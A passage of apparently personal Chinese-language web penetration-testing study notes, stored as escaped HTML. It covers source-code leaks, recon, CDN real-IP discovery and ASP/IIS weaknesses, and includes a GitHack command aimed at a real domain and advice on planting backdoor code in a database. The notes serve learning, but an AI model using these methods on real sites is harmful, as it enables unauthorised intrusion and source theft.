tab)\">.com<\/a>\uff09\u53ef\u4ee5\u6839\u636e\u4fe1\u606f\u627e\u516c\u5f00\u552e\u5356\u7684\u6e90\u7801\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u4fe1\u606f\u6253\u70b9-\u8d44\u4ea7\u6cc4\u9732\u7bc7<\/h3>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">PS.\u9047\u4e8b\u4e0d\u51b3dirsearch\u5f00\u626b\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">CMS\u6307\u7eb9\u8bc6\u522b\u6e90\u7801\u83b7\u53d6<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5229\u7528\u4e91\u6089\u6307\u7eb9\u8bc6\u522b\u5e73\u53f0\uff1a<a href=\"https:\/\/www.yunsee.cn\/\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\"https:\/\/www.yunsee.cn\/ (opens in a new tab)\">https:\/\/www.yunsee.cn\/<\/a><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u5907\u4efd\u6cc4\u9732<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u53ef\u80fd\u5b58\u5728<strong>\u5907\u4efd\u6587\u4ef6<\/strong>\u6ca1\u6709\u653e\u5728\u7f51\u7ad9\u76ee\u5f55\u66f4\u9ad8\u7ea7\u5904\uff0c\u800c\u662f\u76f4\u63a5\u653e\u5728\u4e86\u7f51\u7ad9\u76ee\u5f55\u4e2d\u5bfc\u81f4\u4ed6\u4eba\u53ef\u4ee5\u76f4\u63a5\u8bbf\u95ee\u3002\u901a\u8fc7<strong>dirsearch\u7b49\u76ee\u5f55\u626b\u63cf\u5de5\u5177<\/strong>\u53ef\u4ee5\u626b\u4e00\u4e0b\u6709\u6ca1\u6709\u6cc4\u9732\u7684\u6587\u4ef6\u6216\u538b\u7f29\u5305\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Git\u6cc4\u9732<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>Git\u662f\u4e00\u4e2a\u5f00\u6e90\u5206\u5e03\u5f0f\u7248\u672c\u63a7\u5236\u7cfb\u7edf<\/strong>\uff0c\u6267\u884cgit init\u521d\u59cb\u5316\u76ee\u5f55\u7684\u65f6\u5019\u4f1a\u5728\u5f53\u524d\u76ee\u5f55\u4e0b\u521b\u5efa\u4e00\u4e2a.git\u76ee\u5f55\u7528\u4e8e\u8bb0\u5f55\u4ee3\u7801\u7684\u53d8\u66f4\u8bb0\u5f55\u3002\u53d1\u5e03\u4ee3\u7801\u65f6\u5982\u679c\u6ca1\u628a.git\u76ee\u5f55\u5220\u9664\u5c31\u76f4\u63a5\u53d1\u5e03\u5728\u670d\u52a1\u5668\u4e0a\uff0c\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u5b83\u6765\u6062\u590d\u6e90\u4ee3\u7801\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u53d1\u73b0\u7f51\u7ad9\u76ee\u5f55\u4e0b\u6709.git\u6587\u4ef6\u6cc4\u9732\u65f6\u7528\u5de5\u5177\u53ef\u80fd\u4ece\u4e2d\u83b7\u53d6\u7f51\u7ad9\u6e90\u7801\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5229\u7528\u5de5\u5177-<strong>GitHack<\/strong>\uff1a<a href=\"https:\/\/github.com\/lijiejie\/GitHack\">ht<\/a><a rel=\"noreferrer noopener\" aria-label=\"tps:\/\/github.com\/lijiejie\/GitHack (opens in a new tab)\" href=\"https:\/\/github.com\/lijiejie\/GitHack\" target=\"_blank\">tps:\/\/github.com\/lijiejie\/GitHack<\/a><\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u7528\u6cd5\u793a\u4f8b\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GitHack.py http:\/\/www.openssl.org\/.git\/<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">SVN\u6cc4\u9732<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">SVN\u662f\u4e00\u4e2a\u5f00\u653e\u6e90\u4ee3\u7801\u7684\u7248\u672c\u63a7\u5236\u7cfb\u7edf\u3002\u4f7f\u7528SVN\u7ba1\u7406\u672c\u5730\u4ee3\u7801\u65f6\uff0c\u4f1a\u81ea\u52a8\u751f\u6210\u9690\u85cf\u6587\u4ef6\u5939.svn\uff0c\u5176\u4e2d\u5305\u542b\u6e90\u4ee3\u7801\u4fe1\u606f\u3002\u7f51\u7ad9\u7ba1\u7406\u5458\u5728\u53d1\u5e03\u4ee3\u7801\u65f6\uff0c\u82e5\u6ca1\u6709\u4f7f\u7528\u201c\u5bfc\u51fa\u201d\u529f\u80fd\uff0c\u800c\u662f\u76f4\u63a5\u590d\u5236\u4ee3\u7801\u6587\u4ef6\u5230\u670d\u52a1\u5668\u4e0a\uff0c\u4f1a\u4f7f.svn\u9690\u85cf\u6587\u4ef6\u5939\u66b4\u9732\u4e8e\u5916\u7f51\u73af\u5883\u3002\u5229\u7528<strong>\u2018.svn\/entries\u2019<\/strong>\u6587\u4ef6\u53ef\u4ee5\u83b7\u53d6\u5230\u670d\u52a1\u5668\u6e90\u7801\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5229\u7528\u5de5\u5177-<strong>SvnHack<\/strong>\uff1a<a href=\"https:\/\/github,com\/callmefeifei\/SvnHack\">https:\/\/github,com\/cal<\/a><a rel=\"noreferrer noopener\" aria-label=\"lmefeifei\/SvnHack  (opens in a new tab)\" href=\"https:\/\/github,com\/callmefeifei\/SvnHack\" target=\"_blank\">lmefeifei\/SvnHack <\/a><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">DS_Store\u6cc4\u9732<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">.DS_Store\u662fMac\u4e0bFinder\u7528\u6765\u4fdd\u5b58\u5982\u4f55\u5c55\u793a\u201c\u6587\u4ef6\/\u6587\u4ef6\u5939\u201d\u7684\u6570\u636e\u6587\u4ef6\uff0c\u6bcf\u4e2a\u6587\u4ef6\u5939\u4e0b\u5bf9\u5e94\u4e00\u4e2a\u3002\u82e5\u5c06.DS_Store\u90e8\u7f72\u5230\u670d\u52a1\u5668\uff0c\u53ef\u80fd\u9020\u6210\u6587\u4ef6\u76ee\u5f55\u7ed3\u6784\u6cc4\u9732\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5229\u7528\u5de5\u5177-<strong>ds_store_exp<\/strong>\uff1a<a href=\"https:\/\/github.com\/lijiejie\/ds_store_exp\">https:\/\/github.com\/liji<\/a><a rel=\"noreferrer noopener\" aria-label=\"ejie\/ds_store_exp (opens in a new tab)\" href=\"https:\/\/github.com\/lijiejie\/ds_store_exp\" target=\"_blank\">ejie\/ds_store_exp<\/a><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">SWP\u6cc4\u9732<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">swp\u5373swap\u6587\u4ef6\uff0c\u5728\u7f16\u8f91\u6587\u4ef6\u65f6\u4ea7\u751f\u7684\u4e34\u65f6\u9690\u85cf\u6587\u4ef6\uff0c\u5982\u679c\u7a0b\u5e8f\u6b63\u5e38\u9000\u51fa\u5219\u4f1a\u81ea\u52a8\u5220\u9664\uff0c\u82e5\u610f\u5916\u9000\u51fa\u5c31\u4f1a\u4fdd\u7559\uff0c\u6587\u4ef6\u540d\u4e3a.[filename].swp<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u76f4\u63a5\u8bbf\u95ee.swp\u6587\u4ef6\uff0c\u4e0b\u8f7d\u540e<strong>\u5220\u6389\u672b\u5c3e\u7684.swp<\/strong>\u5373\u53ef\u83b7\u5f97\u6e90\u7801\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">composer.json\u6587\u4ef6<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">PHP\u73af\u5883\u7528\u4e8e\u8bb0\u5f55\u7f51\u7ad9\u6846\u67b6\u7684\u914d\u7f6e\u6587\u4ef6\uff0c\u82e5\u5b58\u5728\u5219\u76f4\u63a5\u8bbf\u95ee<strong>\/compser.json<\/strong>\u53ef\u4ee5\u83b7\u53d6\u4e00\u4e9b\u7f51\u7ad9\u6846\u67b6\u4fe1\u606f\u548cCMS\u4fe1\u606f\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">GITHUB\u6cc4\u9732\uff08\u793e\u5de5\u601d\u8def\uff09<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u6839\u636e\u7f51\u7ad9\u7528\u6237\u4fe1\u606f\uff0c\u5728github\u4e0a\u641c\u7d22\u76f8\u5173\u8d26\u53f7\uff0c\u68c0\u67e5\u662f\u5426\u6709\u7f51\u7ad9\u6e90\u7801\u516c\u5f00\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u53ef\u4ee5\u7528\u811a\u672c\u5de5\u5177\u5bf9\u76ee\u6807Github\u8d26\u6237\u8fdb\u884c\u76d1\u63a7\uff0c\u4e00\u6709\u66f4\u65b0\u5c31\u80fd\u77e5\u9053\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u5176\u4ed6<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5173\u4e8e\u66f4\u8be6\u7ec6\u7684WEB\u6e90\u7801\u6cc4\u9732\u53ef\u53c2\u8003\uff1a<br><a href=\"https:\/\/www.secpulse.com\/archives\/124398.html\">\u5e38\u89c1\u7684Web\u6e90\u7801\u6cc4\u6f0f\u6f0f\u6d1e\u53ca\u5176\u5229\u7528 &#8211; SecPul<\/a><a href=\"https:\/\/www.secpulse.com\/archives\/124398.html\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\"se.COM | \u5b89\u5168\u8109\u640f  (opens in a new tab)\">se.COM | \u5b89\u5168\u8109\u640f <\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u516d\u5929\uff1a\u4fe1\u606f\u6536\u96c6\uff08\u4e8c\uff09<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">\u4fe1\u606f\u6253\u70b9-\u7cfb\u7edf\u7bc7<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u83b7\u53d6\u7f51\u7edc\u4fe1\u606f-\u670d\u52a1\u5382\u5546&amp;\u7f51\u7edc\u67b6\u6784<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u67e5\u8be2\u7f51\u7ad9\u57df\u540d\u3001\u670d\u52a1\u5668\u7684<strong>\u63d0\u4f9b\u5546<\/strong>\uff1b\u67e5\u8be2\u7f51\u7edc\u67b6\u6784\uff0c\u5224\u65ad\u76ee\u6807\u670d\u52a1\u5668\u662f<strong>\u5916\u7f51<\/strong>\u670d\u52a1\u5668\u8fd8\u662f\u67b6\u8bbe\u5728<strong>\u5185\u7f51<\/strong>\u7684\u670d\u52a1\u5668\uff08<strong>\u5185\u7f51\u6620\u5c04<\/strong>\uff09\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5229\u7528<strong>\u65c1\u6ce8<\/strong>\uff08\u540c\u670d\u52a1\u5668\u4e0b\u4e0d\u540cWEB\u5e94\u7528\u67e5\u8be2\u6280\u672f\uff09\u67e5\u627e\u7edf\u4e00IP\u670d\u52a1\u5668\u4e0b\u5b58\u5728\u7684\u5176\u4ed6\u7f51\u7ad9\uff08\u5373IP\u53cd\u67e5\uff09\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u83b7\u53d6\u670d\u52a1\u4fe1\u606f-\u5e94\u7528\u534f\u8bae&amp;\u5185\u7f51\u8d44\u4ea7<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u7528\u5de5\u5177\u626b\u63cf\u76ee\u6807\u670d\u52a1\u5668<strong>\u7aef\u53e3<\/strong>\uff0c\u6536\u96c6\u76f8\u5173\u7684WEB\u5e94\u7528\u4fe1\u606f\uff08\u5bf9\u5e94\u7684\u534f\u8bae\u670d\u52a1\uff09\u5e76\u67e5\u8be2\u76f8\u5173\u53ef\u5229\u7528\u7684\u6f0f\u6d1e\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u626b\u63cf\u670d\u52a1\u5668\u6240\u5904\u7f51\u6bb5\u4fe1\u606f\uff0c\u628aC\u7f51\u6bb5\u4e2d<strong>\u5176\u4f59\u5b58\u6d3b\u4e3b\u673a<\/strong>\uff081-255\uff09\u5217\u4e3a\u5907\u7528\u76ee\u6807\u3002\u82e5\u76ee\u6807\u670d\u52a1\u5668\u627e\u4e0d\u5230\u5229\u7528\u70b9\uff0c\u53ef\u4ee5\u5c1d\u8bd5<strong>\u593a\u53d6\u5185\u7f51\u4e2d\u5176\u4ed6\u4e3b\u673a<\/strong>\uff0c\u7136\u540e\u8fdb\u884c\u6a2a\u5411\u79fb\u52a8\u3001\u5185\u7f51\u6e17\u900f\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u83b7\u53d6\u963b\u788d\u4fe1\u606f-CDN&amp;WAF&amp;\u5747\u8861\u8d1f\u8f7d&amp;\u9632\u706b\u5899<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>CDN\u8bc6\u522b<\/strong>\uff1a\u5229\u7528ping\u5de5\u5177\uff08\u7ad9\u957f\u4e4b\u5bb6\uff09\u68c0\u67e5\u662f\u5426\u5b58\u5728\u591a\u4e2a\u54cd\u5e94ip\u4ece\u800c\u5224\u65ad\u662f\u5426\u5b58\u5728CDN\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>WAF\u8bc6\u522b<\/strong>\uff1a1.\u901a\u8fc7\u56fe\u7247\u8bc6\u522bWAF\uff1b2.\u5229\u7528\u5de5\u5177\u8bc6\u522bWAF\uff08\u4e0d\u4e00\u5b9a\u80fd\u8bc6\u522b\u5230\u81ea\u884c\u5f00\u53d1\u7684WAF\uff09\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">WAF\u8bc6\u522b\u5de5\u5177-wafw00f\uff08WEB\u5e94\u7528\u9632\u706b\u5899\u8bc6\u522b\uff09\uff1a<a href=\"http:\/\/github.com\/EnableSecurity\/waf00f\">https:\/\/github.com\/EnableSecurity\/wa<\/a><a href=\"https:\/\/github.com\/EnableSecurity\/wafw00f\">fw00f<\/a><\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u4e5f\u53ef\u4f7f\u7528Kali\u81ea\u5e26\u5de5\u5177\u5982Nmap\uff08\u8f83\u6162\uff09\u3001<a rel=\"noreferrer noopener\" aria-label=\"Masscan (opens in a new tab)\" href=\"https:\/\/github.com\/robertdavidgraham\/masscan\" target=\"_blank\">Masscan<\/a>\uff08\u8f83\u5feb\uff09\u3001lbd\uff08loading balance dective\u8d1f\u8f7d\u5747\u8861\u68c0\u6d4b\uff09\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u670d\u52a1\u5668\u9632\u706b\u5899\u8bc6\u522b\u4e00\u822c\u7528\u5728\u5185\u7f51\u8bc6\u522b\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u4fe1\u606f\u6253\u70b9-CDN\u7ed5\u8fc7\u7bc7<\/h3>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">PS.\u811a\u672c\u5de5\u5177\u6240\u5f97\u7684IP\u90fd\u6709\u53ef\u80fd\u662f\u5047\u7684\u771f\u5b9eIP\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u9057\u7559\u6587\u4ef6&amp;\u6f0f\u6d1e\u5229\u7528<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u7f51\u7ad9\u53ef\u80fd\u6cc4\u9732\u51faphpinfo\u6587\u4ef6\uff0c\u901a\u8fc7\u8bbf\u95eephpinfo\u4f1a\u63a5\u5230\u670d\u52a1\u5668\u7684\u6b63\u5411\u8fde\u63a5\uff0c\u4ece\u800c\u5728phpinfo\u754c\u9762\u5f97\u5230\u670d\u52a1\u5668\u771f\u5b9eip\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">SSRF\u6f0f\u6d1e\uff1a\u901a\u8fc7SSRF\u6f0f\u6d1e\uff08\u82e5\u5b58\u5728\uff09\u4f7f\u76ee\u6807\u670d\u52a1\u5668\u53cd\u5411\u8fde\u63a5\u5230\u653b\u51fb\u673a\u7684\u6307\u5b9a\u7aef\u53e3\uff08\u8fde\u63a5\u5230\u653b\u51fb\u673a\u7684WEB\u670d\u52a1\uff09\uff0c\u653b\u51fb\u673a\u76d1\u542c\u6307\u5b9a\u7aef\u53e3\uff08\u653b\u51fb\u673a\u5728\u6307\u5b9a\u7aef\u53e3\u5f00\u8bbe\u4e00\u4e2aWEB\u670d\u52a1\uff0c\u4f8b\u5982http\u670d\u52a1\uff09\u4ece\u800c\u5f97\u5230\u76ee\u6807\u670d\u52a1\u5668\u7684\u771f\u5b9eIP\uff08\u539f\u7406\u7c7b\u4f3c\u53cd\u5f39shell\uff09\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u5b50\u57df\u540d\u67e5\u8be2<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u90e8\u5206\u7f51\u7ad9\u53ef\u80fd\u53ea\u7ed9\u4e3b\u57df\u540d\u914d\u7f6e\u4e86CDN\uff0c\u5176\u5b50\u57df\u540d\u53ef\u80fd\u6ca1\u6709CDN\uff0c\u800c\u5b50\u57df\u540d\u53ef\u80fd\u548c\u4e3b\u57df\u540d\u89e3\u6790\u5230\u540c\u4e00\u4e2a\u4e3b\u673a\u3002\u6240\u4ee5\u67e5\u8be2\u5b50\u57df\u540d\u7684\u5730\u5740\u53ef\u80fd\u5f97\u5230\u76ee\u6807\u7f51\u7ad9\u7684\u771f\u5b9eIP\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u63a5\u53e3\u67e5\u8be2\u56fd\u5916\u8bbf\u95ee<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u90e8\u5206\u7f51\u7ad9\u53ef\u80fd\u53ea\u7ed9\u57df\u540d\u914d\u7f6e\u4e86\u56fd\u5185CDN\uff0c\u53ea\u6709\u56fd\u5185\u4e3b\u673a\u8bbf\u95ee\u7f51\u7ad9\u65f6\u4f1a\u4f7f\u7528CDN\u3002\u5229\u7528\u56fd\u5916\u4e3b\u673a\u8fdb\u884cping\u68c0\u6d4b\u53ef\u80fd\u76f4\u63a5\u5f97\u5230\u771f\u5b9eIP\u3002\u5728\u7ebf\u5de5\u5177\uff1a<a href=\"https:\/\/tools.ipip.net\/cdn.php\">https:\/\/tools.ipip.net\/cdn.php<\/a><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u4e3b\u52a8\u90ae\u4ef6\u914d\u5408\u5907\u6848<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u90e8\u5206\u7f51\u7ad9\u53ef\u80fd\u6ca1\u6709\u7ed9\u90ae\u4ef6\u670d\u52a1\u5668\u914d\u7f6eCDN\u3002\u53ef\u4ee5\u901a\u8fc7\u8ba9\u670d\u52a1\u5668\u53d1\u9001\u90ae\u4ef6\u7ed9\u81ea\u5df1\u4ece\u800c\u5f97\u5230\u771f\u5b9eIP\uff08\u5927\u6982\u7387\uff09\uff1b\u7136\u540e\u914d\u5408\u7f51\u7ad9\u7684\u5907\u6848\u4fe1\u606f\uff08\u5982\u5907\u6848\u673a\u5173\u6240\u5728\u5730\uff09\uff0c\u6bd4\u5bf9\u4e24\u8005\u7684\u4fe1\u606f\u8fdb\u4e00\u6b65\u786e\u8ba4IP\u7684\u771f\u5b9e\u6027\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u5728\u7ebf\u5de5\u5177\u67e5\u627e\u771f\u5b9eIP<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5229\u7528\u5728\u7ebf\u5de5\u5177\uff08<a rel=\"noreferrer noopener\" href=\"https:\/\/get-site-ip.com\/\" target=\"_blank\">https:\/\/get-site-ip.com\uff09<\/a> \u67e5\u627e\u76ee\u6807\u7f51\u7ad9\u7684\u771f\u5b9eIP\uff08\u6709\u6982\u7387\u9519\u8bef\uff09\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u5168\u7f51\u626b\u63cfFuckCDN<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5229\u7528\u5728\u7ebf\u5de5\u5177FuckCDN\uff08<a rel=\"noreferrer noopener\" aria-label=\" (opens in a new tab)\" href=\"https:\/\/github.com\/Tai7sy\/fuckcdn\" target=\"_blank\">https:\/\/github.com\/Tai7sy\/fuckcdn<\/a>\uff09\u914d\u7f6e\u5173\u952e\u8bcd\u3001\u8981\u626b\u63cf\u7684\u4e3b\u673a\u6216\u7f51\u6bb5\uff0c\u68c0\u6d4b\u53ef\u80fd\u85cf\u5728\u5176\u4e2d\u7684\u771f\u5b9eIP\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">CDN\u7ed5\u8fc7<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u901a\u8fc7\u914d\u7f6eWindows\u7684hosts\u6587\u4ef6\uff08 C:\\Windows\\System32\\drivers\\etc \uff09\u6216Linux\u4e0b\u7684hosts\u6587\u4ef6\uff08\/etc\/hosts\uff09\uff0c\u6dfb\u52a0\u5bf9\u76ee\u6807\u7f51\u7ad9\u57df\u540d\u7684\u89e3\u6790\uff0c\u4f7f\u5176\u57df\u540d\u89e3\u6790\u6307\u5411\u4e4b\u524d\u624b\u6bb5\u5f97\u5230\u7684\u771f\u5b9eIP\u4ece\u800c\u907f\u5f00CDN\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u4e03\u5929\uff1aWEB\u653b\u9632\uff08\u4e00\uff09<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u653b\u9632-ASP\u5b89\u5168<\/h3>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">ps.\u5982\u4ecaASP\u5df2\u7ecf\u9010\u6e10\u6de1\u51fa\u5b89\u5168\u89c6\u91ce\uff0c\u7528\u5904\u8f83\u5c11\u3002<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">ASP\u5e38\u89c1\u670d\u52a1\u5668\u642d\u5efa\u7ec4\u5408\uff1aWindows(\u7cfb\u7edf)&amp;IIS(\u4e2d\u95f4\u4ef6)&amp;ASP(\u8bed\u8a00)&amp;Access(\u6570\u636e\u5e93)\uff1b\u4e3b\u8981\u4eceIIS&amp;ASP\u5165\u624b\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">ASP-\u6570\u636e\u5e93-MDB\u9ed8\u8ba4\u4e0b\u8f7d<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>Access\u6570\u636e\u5e93<\/strong>\u4e00\u822c\u540e\u7f00\u540d\u4e3aasp\u3001asa\u3001<strong>mdb<\/strong>\uff0c\u5176\u4e2d<strong>mdb\u6587\u4ef6\u53ef\u88ab\u4e0b\u8f7d<\/strong>\u3002mdb\u6587\u4ef6\u653e\u5728\u7f51\u7ad9\u76ee\u5f55\u4e0b\u3002\u82e5\u914d\u7f6e\u7f51\u7ad9\u65f6\u6ca1\u6709\u4fee\u6539\u9ed8\u8ba4\u6570\u636e\u5e93\u8def\u5f84\u3001\u6587\u4ef6\u540d\uff0c\u5219\u53ef\u4ee5\u901a\u8fc7\u9ed8\u8ba4\u8def\u5f84\u4e0b\u8f7d\u6570\u636e\u5e93\u6587\u4ef6\u3002\u4f8b\u5982\uff1a\u8bbf\u95ee192.168.46.160\/database\/powereasy2006.db\uff0c\u83b7\u53d6\u5230\u6570\u636e\u5e93\u6587\u4ef6\u3002\u4e5f\u53ef\u4ee5\u901a\u8fc7\u67e5\u770b\u76f8\u5173\u6e90\u7801\u4e86\u89e3\u5176\u4ed6\u6587\u4ef6\u7684\u9ed8\u8ba4\u8def\u5f84\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">asp\u3001asa\u6587\u4ef6\u9ed8\u8ba4\u8bbe\u7f6e\u8c03\u7528asp.dll\u6587\u4ef6\u8fdb\u884c\u89e3\u6790\uff0c\u800cmdb\u6587\u4ef6\u6ca1\u6709\u8bbe\u7f6e\u9ed8\u8ba4\u89e3\u6790\u6587\u4ef6\uff0c\u56e0\u6b64\u53ef\u4ee5\u901a\u8fc7\u8bbf\u95ee\u76f4\u63a5\u4e0b\u8f7dmdb\u6587\u4ef6\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">ASP\u4e00\u822c\u642d\u914dAccess\u6570\u636e\u5e93\u4f7f\u7528\uff0c\u6240\u4ee5\u6709\u53ef\u80fd\u5b58\u5728\u76f8\u5173\u6f0f\u6d1e\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">ASP-\u6570\u636e\u5e93-\u540e\u95e8\u8fde\u63a5<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u82e5\u6570\u636e\u5e93\u6587\u4ef6\u4e3aasp\uff08\u672c\u8d28\u662f\u6570\u636e\u5e93\u6587\u4ef6\uff0c\u6539\u4e3amdb\u540e\u7f00\u5373\u53ef\u67e5\u770b\u5185\u5bb9\uff09\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u5f80\u6570\u636e\u5e93\u5199\u5165\u540e\u95e8\u4ee3\u7801\uff08\u4f8b\u5982\u7559\u8a00\u677f-\u5982\u679c\u53ef\u4ee5\u7684\u8bdd\uff09\uff0c\u5176\u4e2d\u540e\u95e8\u4ee3\u7801\u53ef\u80fd\u9700\u5148\u7ecf\u8fc7\u89e3\u6790\u7f16\u7801\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">ASP-\u4e2d\u95f4\u4ef6-IIS\u77ed\u6587\u4ef6\u540d\u6f0f\u6d1e<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">IIS\u77ed\u6587\u4ef6\u540d\u6f0f\u6d1e\u5b9e\u9645\u662f\u7531HTTP\u8bf7\u6c42\u4e2d\u65e7DOS 8.3\u540d\u79f0\u7ea6\u5b9a\uff08SFN\uff09\u7684\u4ee3\u5b57\u7b26\uff08\u301c\uff09\u6ce2\u6d6a\u53f7\u5f15\u8d77\u7684\u3002\u5b83\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u5728Web\u6839\u76ee\u5f55\u4e0b\u516c\u5f00\u6587\u4ef6\u548c\u6587\u4ef6\u5939\u540d\u79f0\uff08\u4e0d\u5e94\u8be5\u53ef\u88ab\u8bbf\u95ee\uff09\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u627e\u5230\u901a\u5e38\u65e0\u6cd5\u4ece\u5916\u90e8\u76f4\u63a5\u8bbf\u95ee\u7684\u91cd\u8981\u6587\u4ef6\uff0c\u5e76\u83b7\u53d6\u6709\u5173\u5e94\u7528\u7a0b\u5e8f\u57fa\u7840\u7ed3\u6784\u7684\u4fe1\u606f\u3002 <\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u901a\u8fc7\u76f8\u5173\u6f0f\u6d1e\u5229\u7528\u5de5\u5177\u53ef\u4ee5\u5f97\u5230\u7f51\u7ad9\u540e\u53f0\u7ed3\u6784\uff0c\u6548\u679c\u548cdirsearch\u76ee\u5f55\u626b\u63cf\u5de5\u5177\u76f8\u4f3c\u4f46\u539f\u7406\u4e0d\u540c\u3002dirsearch\u662f\u5229\u7528<strong>\u5b57\u5178\u7206\u7834<\/strong>\uff0c\u800cIIS\u77ed\u6587\u4ef6\u540d\u6f0f\u6d1e\u662f\u5229\u7528IIS\u7684\u7279\u6027\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u4f46\u8fd9\u4e2a\u6f0f\u6d1e\u6709\u7f3a\u9677\uff1a\u53ea\u80fd\u83b7\u53d6\u6587\u4ef6\u540d\u7684<strong>\u524d\u516d\u4f4d\u5b57\u7b26<\/strong>\u3002<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">\u5177\u4f53\u5f71\u54cd\u7248\u672c\u548c\u5229\u7528\u5de5\u5177\u53ef\u81ea\u884c\u641c\u7d22\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">ASP-\u4e2d\u95f4\u4ef6-IIS\u6587\u4ef6\u4e0a\u4f20\u89e3\u6790\u6f0f\u6d1e<\/h4>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">\u4e24\u79cd\u60c5\u51b5\uff1a<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">\u6587\u4ef6\u5939\u89e3\u6790\u6f0f\u6d1e<\/h5>\n\n\n\n<p class=\"has-pale-pink-color 